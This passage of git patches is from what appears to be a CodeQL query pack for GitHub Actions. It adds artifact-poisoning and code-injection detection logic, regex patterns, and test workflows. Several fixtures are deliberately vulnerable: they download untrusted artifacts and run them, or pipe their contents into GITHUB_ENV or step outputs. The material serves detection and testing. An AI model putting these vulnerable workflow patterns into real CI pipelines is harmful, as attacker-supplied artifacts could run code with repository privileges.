runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Run command + run: ./foo/cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml new file mode 100644 index 00000000000..7a837ee42d2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml @@ -0,0 +1,21 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo + unzip artifact_name.zip -d bar + - name: Run command + run: | + ./bar/cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml new file mode 100644 index 00000000000..39ec063c7b6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml @@ -0,0 +1,21 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo + unzip foo/artifact_name.zip + - name: Run command + run: | + ./bar/cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml new file mode 100644 index 00000000000..afa3e15132e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + artifacts_url=${{ github.event.workflow_run.artifacts_url }} + gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact + do + IFS=$'\t' read name url <<< "$artifact" + gh api $url > "$name.zip" + unzip -d "foo" "$name.zip" + done + - name: Run command + run: ./foo/cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml similarity index 89% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml index 26d342f7060..d3100d46edc 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml @@ -16,10 +16,10 @@ jobs: do IFS=$'\t' read name url <<< "$artifact" gh api $url > "$name.zip" - unzip -d "$name" "$name.zip" + unzip "$name.zip" done - name: Run command - run: cmd + run: ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml new file mode 100644 index 00000000000..ca074428ccf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml @@ -0,0 +1,24 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV + + + + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 8113215481c..907979b88e7 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -1,4 +1,10 @@ -| .github/workflows/artifactpoisoning1.yml:13:9:30:6 | Uses Step | Potential artifact poisoning. | -| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Potential artifact poisoning. | -| .github/workflows/artifactpoisoning3.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | -| .github/workflows/artifactpoisoning4.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 5a572edf423..7bee36029d6 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,6 +1,7 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | From 3209378f453a2ad58038e8d74b77747d344f5013 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Apr 2024 14:25:25 +0200 Subject: [PATCH 0149/1267] Remove TODO --- ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll | 1 - 1 file changed, 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index c64a7d0e338..8094235292a 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -196,4 +196,3 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { ) } } -// TODO: Taint Step for output var definition based on file content. eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT` From 2651e5a673137a923cd744dd69dc3d8e937d46e5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 12:52:10 +0200 Subject: [PATCH 0150/1267] Improve Artifact poisoning related queries --- ql/lib/codeql/actions/Ast.qll | 53 ++++++++++ .../codeql/actions/dataflow/FlowSources.qll | 10 ++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 23 ++++- .../dataflow/internal/DataFlowPrivate.qll | 6 +- .../security/ArtifactPoisoningQuery.qll | 98 +++++++++++++++---- ql/lib/ext/marocchino_on_artifact.model.yml | 6 ++ ...bers-in-action_download-artifact.model.yml | 7 ++ ql/test/library-tests/test.expected | 16 +++ ql/test/library-tests/test.ql | 29 ++++++ .../.github/workflows/artifactpoisoning1.yml | 89 +++++++++++++++++ .../.github/workflows/artifactpoisoning2.yml | 23 +++++ .../Security/CWE-094/CodeInjection.expected | 8 ++ .../CWE-094/PrivilegedCodeInjection.expected | 10 ++ 13 files changed, 352 insertions(+), 26 deletions(-) create mode 100644 ql/lib/ext/marocchino_on_artifact.model.yml create mode 100644 ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 720fd29feb0..a9fe35259c5 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -18,6 +18,59 @@ module Utils { "toJSON\\(\\s*" + regex + "\\s*\\)" ] } + + bindingset[line, var] + predicate extractAssignment(string line, string var, string key, string value) { + exists(string assignment | + ( + assignment = + line.regexpCapture("(echo|Write-Output)\\s+\"(.*)\"\\s*>>\\s*(\"|')?\\$GITHUB_" + + var.toUpperCase() + "(\"|')?", 2) + .regexpReplaceAll("^\"", "") + .regexpReplaceAll("\"$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+'(.*)'\\s*>>\\s*(\"|')?\\$GITHUB_" + + var.toUpperCase() + "(\"|')?", 2) + .regexpReplaceAll("^'", "") + .regexpReplaceAll("'$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+([^'\"]*)\\s*>>\\s*(\"|')?\\$GITHUB_" + + var.toUpperCase() + "(\"|')?", 2) + ) and + key = assignment.splitAt("=", 0).trim() and + value = assignment.splitAt("=", 1).trim() + or + ( + assignment = + line.regexpCapture("(echo|Write-Output)\\s+\"::set-" + var.toLowerCase() + + "\\s+name=(.*)\"", 2).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+'::set-" + var.toLowerCase() + "\\s+name=(.*)'", + 2).regexpReplaceAll("^'", "").regexpReplaceAll("'$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+::set-" + var.toLowerCase() + "\\s+name=(.*)", + 2) + ) and + key = assignment.splitAt("::", 0).trim() and + value = assignment.splitAt("::", 1).trim() + ) + } + + predicate writeToGitHubEnv(Run run, string key, string value) { + exists(string script, string line | + script = run.getScript() and + line = script.splitAt("\n") and + Utils::extractAssignment(line, "ENV", key, value) + ) + } + + predicate writeToGitHubOutput(Run run, string key, string value) { + exists(string script, string line | + script = run.getScript() and + line = script.splitAt("\n") and + Utils::extractAssignment(line, "OUTPUT", key, value) + ) + } } class AstNode instanceof AstNodeImpl { diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 699b5f6f6c3..c0e0e759120 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.security.ArtifactPoisoningQuery /** * A data flow source. @@ -157,3 +158,12 @@ private class CompositeActionInputSource extends RemoteFlowSource { override string getSourceType() { result = "Composite action input" } } + +/** + * A downloadeded artifact. + */ +private class ArtifactToOptionSource extends RemoteFlowSource { + ArtifactToOptionSource() { this.asExpr() instanceof ArtifactDownloadStep } + + override string getSourceType() { result = "Step output from Artifact" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 34357816812..242cbcf9a31 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -6,6 +6,8 @@ private import actions private import codeql.util.Unit private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.security.ArtifactPoisoningQuery /** * A unit class for adding additional taint steps. @@ -40,12 +42,25 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo exists(string script, string line | script = run.getScript() and line = script.splitAt("\n") and - ( - output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or - output = line.regexpCapture(".*echo\\s*\"(.*)=.*\\s*>>\\s*(\")?\\$GITHUB_OUTPUT.*", 1) - ) and + Utils::extractAssignment(line, "OUTPUT", output, _) and line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = run ) } + +/** + * A downloaded artifact that gets assigned to a Run step output. + * - uses: actions/download-artifact@v2 + * - run: echo "::set-output name=id::$(>\\s*\\$GITHUB_ENV", 2) and - value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) - ) -} - class EnvVarInjectionRunStep extends PoisonableStep, Run { EnvVarInjectionRunStep() { exists(ArtifactDownloadStep step, string value | @@ -191,8 +247,10 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { // Heuristic: // Run step with env var definition based on file content. // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` - writeToGithubEnv(this, _, value) and - value.regexpMatch(".*cat\\s+.*") + // eg: `echo "sha=$(> $GITHUB_ENV` + Utils::writeToGitHubEnv(this, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml new file mode 100644 index 00000000000..9f621758cff --- /dev/null +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml new file mode 100644 index 00000000000..52c478dd1d4 --- /dev/null +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact"] + diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index ea353609e24..8b5f3e7184b 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -329,7 +329,9 @@ sources | jitterbit/get-changed-files | * | output.removed | PR changed files | | jitterbit/get-changed-files | * | output.renamed | PR changed files | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | +| marocchino/on_artifact | * | output.* | Downloaded artifact | | octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | | tj-actions/branch-names | * | output.current_branch | PR current branch | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | | tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | @@ -425,3 +427,17 @@ testNormalizeExpr | github.event.pull_request.user["login"] | github.event.pull_request.user.login | | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv +| id1 | $(> $GITHUB_ENV", + "echo 'sha2=$(> $GITHUB_ENV", + "echo sha3=$(> $GITHUB_ENV", + ] and + Utils::extractAssignment(t, "ENV", key, value) + ) +} + +query predicate writeToGitHubOutput(string key, string value) { + exists(string t | + t = + [ + "echo \"::set-output name=id1::$(> $GITHUB_OUTPUT", + "echo 'sha2=$(> $GITHUB_OUTPUT", + "echo sha3=$(> $GITHUB_OUTPUT", + ] and + Utils::extractAssignment(t, "OUTPUT", key, value) + ) +} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml new file mode 100644 index 00000000000..8475711949f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml @@ -0,0 +1,89 @@ +name: Preview Deploy + +on: + workflow_run: + workflows: ["Preview Build"] + types: + - completed + +jobs: + success: + runs-on: ubuntu-latest + if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'success' + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + name: pr + + - name: save PR id + id: pr + run: echo "::set-output name=id::$( + + + body-include: '' + number: ${{ steps.pr.outputs.id }} + + - name: The job failed + if: ${{ failure() }} + uses: actions-cool/maintain-one-comment@v1.2.1 + with: + token: ${{ secrets.GITHUB_TOKEN }} + body: | + 😭 Deploy PR Preview failed. + + + + + body-include: '' + number: ${{ steps.pr.outputs.id }} + + failed: + runs-on: ubuntu-latest + if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'failure' + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + name: pr + + - name: save PR id + id: pr + run: echo "::set-output name=id::$( + + + body-include: '' + number: ${{ steps.pr.outputs.id }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml new file mode 100644 index 00000000000..f8d80cc798e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml @@ -0,0 +1,23 @@ +name: Preview Deploy + +on: + workflow_run: + workflows: ["Preview Build"] + types: + - completed + +jobs: + success: + runs-on: ubuntu-latest + steps: + - id: pr + name: Download Artifact + uses: redhat-plumbers-in-action/download-artifact@main + with: + name: README + + - name: upload surge service + id: deploy + run: | + echo ${{ steps.pr.outputs.id }} + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 6cb2c1ed399..d2e188ead67 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -2,6 +2,9 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | @@ -64,6 +67,11 @@ nodes | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 25441104064..bc1fd870950 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -2,6 +2,9 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | @@ -64,6 +67,11 @@ nodes | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | @@ -210,6 +218,8 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | From 56d2d8ec1000c5666258f1031237170cc1141fb6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 12:54:30 +0200 Subject: [PATCH 0151/1267] Update test results --- ql/test/library-tests/test.expected | 2 -- 1 file changed, 2 deletions(-) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 8b5f3e7184b..6fe9408a7a3 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -329,9 +329,7 @@ sources | jitterbit/get-changed-files | * | output.removed | PR changed files | | jitterbit/get-changed-files | * | output.renamed | PR changed files | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | -| marocchino/on_artifact | * | output.* | Downloaded artifact | | octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | | tj-actions/branch-names | * | output.current_branch | PR current branch | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | | tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | From 45a51a9f7417c64083fa6511cc81acaedab08b3b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 12:55:24 +0200 Subject: [PATCH 0152/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- 